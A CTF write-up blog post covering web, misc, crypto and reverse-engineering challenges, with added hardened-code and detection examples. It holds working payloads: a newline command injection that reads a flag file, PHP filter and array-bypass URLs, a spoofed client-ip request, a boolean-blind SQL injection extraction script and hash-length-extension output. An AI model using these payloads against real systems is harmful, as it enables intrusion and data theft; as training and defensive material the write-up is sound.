NEKO

[Untitled Post]

2016/05/01

WEB

Compare the numbers

Use F12 to change the input's maxlength, then enter a larger number. The limit is enforced only in the browser.

Can you get across?

Original problem from 实验吧.
The +/v+ prefix tells you it is UTF-7; UTF-7-decode the data that follows and enter the key.

web01

password[]=1

Why is it so simple?

The source is in password.js.
Append an = and base64-decode.

It's all routine

index.php.txt source leak.
Original: https://github.com/CHYbeta/Code-Audit-Challenges/blob/master/php/challenge-17.md

The temptation of localhost

The challenge was down; the source can be read from the page source.
The point being tested is X-Forwarded-For forgery.

Please ping my IP, can you reach it?

POST:
ip=127.0.0.1%0a(cat flag)
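The %0a above is a URL-encoded newline, which ends the ping command and starts a new one once the value is spliced into a shell string. The following is an added example (not code from the challenge or the writeup) showing the vulnerable pattern beside a hardened version: the target is validated as a literal IP address with the ipaddress module and passed to subprocess as an argv list, never through a shell. All function names here are the example's own.

```python
import ipaddress
import subprocess


def build_ping_unsafe(target: str) -> str:
    # Vulnerable pattern: the user-supplied target is spliced into a shell command line.
    # A newline (%0a) or ';' in the target terminates the ping command and starts another.
    return "ping -c 1 " + target


def validate_target(target: str) -> str:
    """Accept only a literal IPv4/IPv6 address.

    Hostnames, surrounding whitespace and shell metacharacters all raise ValueError.
    Nothing is stripped or normalised before the check, so "127.0.0.1\\n..." fails.
    """
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        raise ValueError("target is not an IP address: %r" % target) from None


def is_valid_target(target: str) -> bool:
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_ping_safe(target: str) -> list:
    # Hardened: an argv list executed without a shell, so metacharacters are never
    # interpreted, and the target is validated before it reaches a process at all.
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str, timeout: float = 5.0) -> int:
    # Returns ping's exit status (0 = host answered). Output is captured rather than
    # echoed back to the user, which also keeps the tool's stderr out of the page.
    result = subprocess.run(build_ping_safe(target), capture_output=True, timeout=timeout)
    return result.returncode
```

If the feature genuinely needs hostnames, resolve them against an explicit allow-list rather than loosening validate_target; the argv-list call still protects against metacharacters, but a hostname input would let users pick arbitrary targets for the server's ping.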

Please give me username and password!

index.php.txt source leak.
Payload:

http://118.190.152.202:8017/index.php?username[]=1&password=1e9

Can you bypass it?

File inclusion plus case bypass (PHP:// instead of php://).
Payload:

http://118.190.152.202:8008/index.php?f=PHP://filter/read=convert.base64-encode/resource=index&id=1

web02

Burp:

GET / HTTP/1.1
Host: 118.190.152.202:8004
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
client-ip: 127.0.0.1
Connection: close
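Both "The temptation of localhost" and web02 pass because the application reads a client-supplied header (X-Forwarded-For, client-ip) as if it were the caller's address. The following is an added example, not code from the challenges, of how a server should resolve the client address: the TCP peer is authoritative, forwarding headers are honoured only when the peer is a known reverse proxy, and forwarding headers arriving from anyone else are flagged as a spoofing signal. The trusted-proxy address 10.0.0.5 and all function names are this example's own assumptions.

```python
import ipaddress

# Constructed for this example: the reverse proxies whose forwarding headers we trust.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

# Headers any client can set freely; none of them proves anything on its own.
FORWARDING_HEADERS = ("x-forwarded-for", "x-real-ip", "client-ip", "x-client-ip")


def client_ip(peer_addr: str, headers: dict):
    """Resolve the effective client address.

    The TCP peer address is authoritative. X-Forwarded-For is consulted only when
    the peer is a trusted proxy, and then only its last entry (the one our proxy
    appended); earlier entries and the other forwarding headers are client-controlled.
    """
    peer = ipaddress.ip_address(peer_addr)
    if peer not in TRUSTED_PROXIES:
        return peer
    lowered = {k.lower(): v for k, v in headers.items()}
    xff = lowered.get("x-forwarded-for", "")
    last = xff.split(",")[-1].strip()
    try:
        return ipaddress.ip_address(last)
    except ValueError:
        return peer  # malformed header from our own proxy: fall back rather than guess


def is_local_request(peer_addr: str, headers: dict) -> bool:
    # The "localhost only" check the challenges above get wrong by reading the header directly.
    return client_ip(peer_addr, headers).is_loopback


def spoofed_forwarding_headers(peer_addr: str, headers: dict) -> list:
    """Detection: forwarding headers from a non-proxy peer are worth logging as spoof attempts."""
    if ipaddress.ip_address(peer_addr) in TRUSTED_PROXIES:
        return []
    return [k for k in headers if k.lower() in FORWARDING_HEADERS]
```

With this resolver the Burp request above, sent from an external address with client-ip: 127.0.0.1, resolves to the external address and is_local_request returns False; the same header from the trusted proxy is also ignored, because only the proxy-appended X-Forwarded-For entry is read.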

PHP, the best language in the world

An md5 hash starting with 0e.
?a=GLOBALS

The art of SQL injection

Wide-byte injection.

Give it a try

Original: http://blog.chrstm.com/2017/02/06/hctfGame3/

Inject inject inject

Boolean-based blind injection; write a script:

# encoding=utf-8
import requests
import string

dic = string.ascii_letters + string.digits + '{}@,_?'
correct_status = 'normal user'  # substring present in the response when the injected condition is true
url = "http://118.190.152.202:8011/"
strs = ''
choice = 4  # 1: database name, 2: table names, 3: column names, 4: flag
for j in range(1, 150):  # j = number of characters recovered so far + 1
    for i in dic:
        if choice == 1:
            # dump the database name
            data = {"username": "admin' and left(database(),%s)='%s'#" % (j, strs + i), 'password': '123'}
        elif choice == 2:
            # dump the tables: news, user
            data = {"username": "admin' and left((select group_concat(table_name) from information_schema.tables where table_schema=database()),%s)='%s'#" % (j, strs + i), 'password': '123'}
        elif choice == 3:
            # columns: title,note,kjafuibafuohnuvwnruniguankacbh,id,date,text
            data = {"username": "admin' and left((select group_concat(column_name) from information_schema.columns where table_name='news'),%s)='%s'#" % (j, strs + i), 'password': '123'}
        elif choice == 4:
            # flag
            data = {"username": "admin' and left((select kjafuibafuohnuvwnruniguankacbh from news),%s)='%s'#" % (j, strs + i), 'password': '123'}

        r = requests.post(url=url, data=data).text
        if correct_status in r:
            strs += i
            print(strs)
            break
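The script works because the login splices the username straight into the SQL text, so a quote in the input becomes syntax and the true/false outcome of an appended condition shows up as a different page. The following is an added example, not code from the challenge, showing that vulnerable shape beside the parameterised form, plus a coarse heuristic for spotting the probe tokens (left(, information_schema, group_concat(, database()) that this kind of extraction leaves in login attempts. SQLite stands in for the challenge's MySQL backend, the sample row is constructed, and every function and constant name is this example's own.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample table; SQLite stands in for the challenge's MySQL backend.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct horse')")
    return conn


def login_unsafe(conn, username: str, password: str):
    # Vulnerable: the same string-splicing the challenge's login does. Quotes in the
    # input become SQL syntax, which is exactly what the script above relies on.
    sql = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return conn.execute(sql).fetchone()


def login_safe(conn, username: str, password: str):
    # Hardened: bound parameters travel separately from the SQL text, so a quote
    # in the username is just a character being compared.
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


# Tokens typical of boolean/time-based blind probing, as a coarse WAF/log heuristic.
# It is a signal for investigation, not a substitute for parameterised queries.
BLIND_PROBE = re.compile(
    r"(?i)\b(left|substr|substring|mid|ascii|ord|sleep|benchmark)\s*\("
    r"|information_schema|group_concat\s*\(|database\s*\(\)"
)


def looks_like_blind_probe(value: str) -> bool:
    return bool(BLIND_PROBE.search(value))


def probe_ratio(usernames: list) -> float:
    # Share of login attempts carrying probe tokens; a burst of them from one client
    # is the character-by-character pattern the script above produces.
    if not usernames:
        return 0.0
    return sum(looks_like_blind_probe(u) for u in usernames) / len(usernames)
```

A tautology-shaped username such as admin' and 'a'='a'-- logs in through login_unsafe with any password and is rejected by login_safe, because the parameterised query compares the literal string, quote and all, against the stored username.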

Collide

Hash length extension attack:

root@neko:~/ctf/hash_extender# ./hash_extender -d guest -s 78cfc57d983b4a17e55828c001a3e781 -f md5 -l 46 -a admin --out-data-format html
Type: md5
Secret length: 46
New signature: 5f585093a7fe86971766c3d25c43d0eb
New string: guest%80%00%00%00%00%98%01%00%00%00%00%00%00admin
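The new string above is the original data followed by MD5's own padding (0x80, zero bytes, and the 8-byte little-endian bit length of secret plus data, here 0x198 = 408 bits = 46 + 5 bytes) and then the appended data; the tag for it can be computed from the old tag alone because an MD5 digest is simply the final internal state. The following is an added example, not code from the challenge or from hash_extender, showing the construction that is vulnerable (H(secret || data)), the HMAC construction that is not, and a detection helper that recognises an embedded MD5 padding block in a submitted value and reports the secret length it implies. The key bytes and all function names are this example's own assumptions.

```python
import hashlib
import hmac
import urllib.parse


def naive_tag(secret: bytes, data: bytes) -> str:
    # The weak construction behind this challenge: H(secret || data). MD5's digest
    # is its final state, so anyone holding the tag can keep hashing from that state.
    return hashlib.md5(secret + data).hexdigest()


def hmac_tag(secret: bytes, data: bytes) -> str:
    # The fix: HMAC wraps the key around the message (inner and outer hash), so the
    # tag is not a continuable state and data appended without the key fails to verify.
    return hmac.new(secret, data, hashlib.md5).hexdigest()


def hmac_verify(secret: bytes, data: bytes, tag: str) -> bool:
    return hmac.compare_digest(hmac_tag(secret, data), tag)


def find_md5_glue(data: bytes):
    """Detection helper for a length-extended value.

    Looks for an MD5 padding block (0x80, zero bytes, 8-byte little-endian bit
    length) whose length field is consistent with the bytes before it, i.e. the
    padded message ends exactly on a 64-byte block boundary. Returns the secret
    length the block implies (length field minus the prefix length), or None.
    """
    for i, byte in enumerate(data):
        if byte != 0x80:
            continue
        zeros = 0
        while i + 1 + zeros < len(data) and data[i + 1 + zeros] == 0:
            zeros += 1
        # The length field may itself begin with zero bytes, so try every split.
        for z in range(zeros + 1):
            pos = i + 1 + z
            if pos + 8 > len(data):
                break
            bits = int.from_bytes(data[pos:pos + 8], "little")
            if bits % 8:
                continue
            msg_len = bits // 8          # len(secret) + len(original data)
            secret_len = msg_len - i     # i = length of the visible prefix
            if secret_len < 0:
                continue
            if (msg_len + 1 + z + 8) % 64 == 0:  # padding ends on a block boundary
                return secret_len
    return None


# The extended string hash_extender printed above, decoded from its %xx form.
EXTENDED = urllib.parse.unquote_to_bytes(
    "guest%80%00%00%00%00%98%01%00%00%00%00%00%00admin"
)
```

Run over EXTENDED, find_md5_glue returns 46, the same secret length the tool was given with -l, which is why a server that sees a 0x80-led padding block inside a field it expects to be plain text should treat the request as tampered even before checking the signature. The same structural check applies to SHA-1 and SHA-256 with a big-endian length field; SHA-3 and HMAC are not extendable.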

Only admin can see flag

CBC byte flipping.

MISC

Numeric ciphertext

decode('hex')

What is that?

Change the PNG height with WinHex.

Secret telegram

Bacon cipher.
Don't use the 米特斯 security team's CTFtools to decode it, ugh.

Interesting ISCC

binwalk -> zlib; there is data after the zlib stream, in Unicode.

Where is the FLAG?

Loading it in Photoshop says it contains Adobe Fireworks data.
Open it with Adobe Fireworks and there is a layer holding a QR code.

Layers of spies

base64 decodes to:

U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4B5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1ziN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc=

Be sure to delete the %0a, then AES-decrypt at http://tool.oschina.net/encrypt/
Then decode 与佛论禅 (Buddhist-sutra encoding) at:
http://www.keyfc.net/bbs/tools/tudoucode.aspx

Brute force is not the way

ZIP pseudo-encryption -> Caesar decryption.

What a cat is thinking

There is a .doc after the image; binwalk didn't find it, not sure why.
doc -> 与佛论禅 decode -> hex, base64, base32 multi-layer decoding.

Caesar XIII

rot13 gives: roqtp697t95j3
Look at the keyboard and take the next key diagonally from each one.

RE

RSA

Can't they at least unify the flag format:
flag{3b6d3806-4b2b-11e7-95a0-000c29d7e93d}
The usual routine: work out all the parameters.

from Crypto.PublicKey import RSA


def egcd(a, b):
    # extended Euclid: returns (g, x, y) with a*x + b*y = g
    if b == 0:
        return a, 1, 0
    g, x, y = egcd(b, a % b)
    return g, y, x - a // b * y


pub = RSA.importKey(open("public.key").read())
n = pub.n  # n=98432079271513130981267919056149161631892822707167177858831841699521774310891
e = pub.e  # e=65537
p = 302825536744096741518546212761194311477
q = 325045504186436346209877301320131277983

phi = (p - 1) * (q - 1)
d = egcd(e, phi)[1] % phi  # reduce modulo phi so d is positive


def decrypt_file(name):
    # ciphertext file -> integer -> m = c^d mod n -> bytes
    c = int.from_bytes(open(name, 'rb').read(), 'big')
    m = hex(pow(c, d, n))[2:]
    if len(m) % 2 == 1:
        m = '0' + m
    return bytes.fromhex(m)


for name in ('encrypted.message1', 'encrypted.message2', 'encrypted.message3'):
    print(decrypt_file(name))
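The key fell to "the usual routine" because n is only 256 bits long with two 128-bit primes, far below any size that resists factoring. The following is an added example, not the writeup's script, that audits the key size from the public parameters above, computes d with the standard library's modular inverse instead of a hand-written egcd, and sanity-checks the result with an encrypt/decrypt round trip. The numeric constants are copied from the writeup; the function names are this example's own.

```python
import math

# Challenge parameters, copied from the writeup above.
N = 98432079271513130981267919056149161631892822707167177858831841699521774310891
E = 65537
P = 302825536744096741518546212761194311477
Q = 325045504186436346209877301320131277983


def private_exponent(p: int, q: int, e: int) -> int:
    # d = e^-1 mod phi(n); pow(e, -1, m) is the stdlib modular inverse (Python 3.8+),
    # which replaces the hand-written egcd of the solve script.
    phi = (p - 1) * (q - 1)
    if math.gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return pow(e, -1, phi)


def key_report(n: int, e: int, p: int = None, q: int = None) -> dict:
    """Why this key fell: a 256-bit modulus with 128-bit primes is well inside
    what off-the-shelf factoring handles; 2048 bits is the usual floor today."""
    report = {
        "modulus_bits": n.bit_length(),
        "below_2048": n.bit_length() < 2048,
        "e_is_common": e == 65537,
    }
    if p is not None and q is not None:
        report["factors_verified"] = p * q == n
        report["factor_bits"] = (p.bit_length(), q.bit_length())
    return report


def roundtrip_ok(m: int, n: int, e: int, d: int) -> bool:
    # Sanity check on a recovered private exponent: encrypt then decrypt must return m.
    return m < n and pow(pow(m, e, n), d, n) == m


def decrypt_bytes(ciphertext: bytes, n: int, d: int) -> bytes:
    # The same recovery the solve script does, with Python 3 byte handling.
    m = pow(int.from_bytes(ciphertext, "big"), d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")
```

key_report(N, E, P, Q) reports a 256-bit modulus split into two 128-bit factors, and roundtrip_ok confirms that the d derived from those factors really inverts E before it is used on the three message files.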

My math is bad

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  puts("=======================================");
  puts("= Welcome to the flag access machine! =");
  puts("= Input the password to login ... =");
  puts("=======================================");
  __isoc99_scanf("%s", s);
  if ( (unsigned int)sub_400766() )
  {
    puts("Congratulations! You should get the flag...");
    sub_400B16();
  }
  else
  {
    puts("Wrong password!");
  }
  return 0LL;
}

The check function is sub_400766().

Cleaned-up sub_400766():

  if ( strlen(s) != 32 )
    return 0LL;
  x1 = s_16;
  x2 = s_20;
  x3 = s_24;
  x4 = s_28;
  if ( s_4 * (signed __int64)*(signed int *)s - s_12 * (signed __int64)s_8 != 2652042832920173142LL )
    goto LABEL_15;
  if ( 3LL * s_8 + 4LL * s_12 - s_4 - 2LL * *(signed int *)s != 397958918 )
    goto LABEL_15;
  if ( 3 * *(signed int *)s * (signed __int64)s_12 - s_8 * (signed __int64)s_4 != 3345692380376715070LL )
    goto LABEL_15;
  if ( 27LL * s_4 + *(signed int *)s - 11LL * s_12 - s_8 != 40179413815LL )
    goto LABEL_15;
  srand(s_8 ^ s_4 ^ *(_DWORD *)s ^ s_12);
  v1 = rand() % 50;
  v2 = rand() % 50;
  v7 = rand() % 50;
  v8 = rand() % 50;
  v9 = rand() % 50;
  v10 = rand() % 50;
  v11 = rand() % 50;
  v12 = rand() % 50;
  if ( x4 * v2 + x1 * v1 - x2 - x3 != 61799700179LL
    || x4 + x1 + x3 * v8 - x2 * v7 != 48753725643LL
    || x1 * v9 + x2 * v10 - x3 - x4 != 59322698861LL
    || x3 * v12 + x1 - x2 - x4 * v11 != 51664230587LL )
  {
LABEL_15:
    result = 0LL;
  }
  else
  {
    result = 1LL;
  }
  return result;
}

First solve the first system of equations to recover the first half of s.
The second system needs s_8 ^ s_4 ^ *(_DWORD *)s ^ s_12 as the srand() seed that generates its coefficients.
Solve it for the second half of s.
Enter s into the binary to get the flag.
sympy is convenient for solving the equations:

# encoding=utf-8
import struct
from sympy import *

# Solve the first system of equations (uncomment to re-run; the solution is pasted below)
# x1, x2, x3, x4 = symbols('x1 x2 x3 x4')
# print(solve([(x2*x1)-(x4*x3)-2652042832920173142,
#              3*x3+4*x4-x2-2*x1-397958918,
#              (3*x1*x4)-(x3*x2)-3345692380376715070,
#              27*x2+x1-11*x4-x3-40179413815], [x1, x2, x3, x4]))


x1 = 1869639009
x2 = 1801073242
x3 = 829124174
x4 = 862734414
x = (x1, x2, x3, x4)
half1_s = b''
for i in x:
    half1_s += struct.pack('<I', i)  # pack little-endian

# x3^x2^x1^x4 = 103643451, the srand() seed

# rand() % 50 values produced from that seed
v1 = 125279272 % 50
v2 = 774372789 % 50
v7 = 1384667095 % 50
v8 = 155318995 % 50
v9 = 311698135 % 50
v10 = 1917753591 % 50
v11 = 641718563 % 50
v12 = 1386974386 % 50

# Solve the second system of equations
# x1, x2, x3, x4 = symbols('x1 x2 x3 x4')
# print(solve([x4 * v2 + x1 * v1 - x2 - x3 - 61799700179,
#              x4 + x1 + x3 * v8 - x2 * v7 - 48753725643,
#              x1 * v9 + x2 * v10 - x3 - x4 - 59322698861,
#              x3 * v12 + x1 - x2 - x4 * v11 - 51664230587], [x1, x2, x3, x4]))


x1 = 811816014
x2 = 828593230
x3 = 1867395930
x4 = 1195788129
x = (x1, x2, x3, x4)
half2_s = b''
for i in x:
    half2_s += struct.pack('<I', i)  # pack little-endian
print(half1_s + half2_s)
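Before typing a solver's output into the binary it pays to replay the decompiled check in Python, so that an endianness slip or a mis-copied constant shows up locally rather than as "Wrong password!". The following is an added example, not the writeup's script, that ports sub_400766() above to Python: it unpacks the 32-byte input the way the C reads it (eight little-endian 32-bit ints), applies the two equation systems with the constants from the decompilation, and recomputes the srand() seed. The rand() % 50 values are taken from the writeup rather than recomputed, since they come from glibc's generator for that seed; the function and constant names are this example's own.

```python
import struct

# Constants copied from the decompiled sub_400766() above.
FIRST = (2652042832920173142, 397958918, 3345692380376715070, 40179413815)
SECOND = (61799700179, 48753725643, 59322698861, 51664230587)

# rand() outputs for srand(s_8 ^ s_4 ^ *s ^ s_12) as reported in the writeup
# (glibc rand() sequence for that seed; not recomputed here), reduced mod 50.
RAND_MOD_50 = tuple(v % 50 for v in (
    125279272, 774372789, 1384667095, 155318995,
    311698135, 1917753591, 641718563, 1386974386,
))


def seed(s: bytes) -> int:
    # srand(s_8 ^ s_4 ^ *(_DWORD *)s ^ s_12)
    a, b, c, d = struct.unpack('<4I', s[:16])
    return c ^ b ^ a ^ d


def check(s: bytes, rand_mod_50=RAND_MOD_50) -> bool:
    """Python port of sub_400766(): True iff the binary would accept s."""
    if len(s) != 32:
        return False
    # *(signed int *)s, s_4, s_8, s_12 : the first half of the input
    a, b, c, d = struct.unpack('<4i', s[:16])
    # s_16, s_20, s_24, s_28 : x1..x4 in the decompilation
    x1, x2, x3, x4 = struct.unpack('<4i', s[16:])
    # First system (64-bit products in C; Python ints never overflow, and the
    # values solved for here are small enough that the C code does not either).
    if b * a - d * c != FIRST[0]:
        return False
    if 3 * c + 4 * d - b - 2 * a != FIRST[1]:
        return False
    if 3 * a * d - c * b != FIRST[2]:
        return False
    if 27 * b + a - 11 * d - c != FIRST[3]:
        return False
    # Second system, with the rand() % 50 coefficients derived from the seed.
    v1, v2, v7, v8, v9, v10, v11, v12 = rand_mod_50
    return (x4 * v2 + x1 * v1 - x2 - x3 == SECOND[0]
            and x4 + x1 + x3 * v8 - x2 * v7 == SECOND[1]
            and x1 * v9 + x2 * v10 - x3 - x4 == SECOND[2]
            and x3 * v12 + x1 - x2 - x4 * v11 == SECOND[3])


def candidate() -> bytes:
    # The eight values the sympy solve above produced, packed little-endian.
    first = (1869639009, 1801073242, 829124174, 862734414)
    second = (811816014, 828593230, 1867395930, 1195788129)
    return struct.pack('<4I', *first) + struct.pack('<4I', *second)
```

check(candidate()) returning True, and seed(candidate()) matching the 103643451 noted in the script, is the confirmation that the packed bytes are the password the binary wants; any other 32-byte string fails at the first equation.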

Author: n3k0

Published: May 1st 2016, 1:09:27

Shout: no 魔夜2 to play, I'm dying.
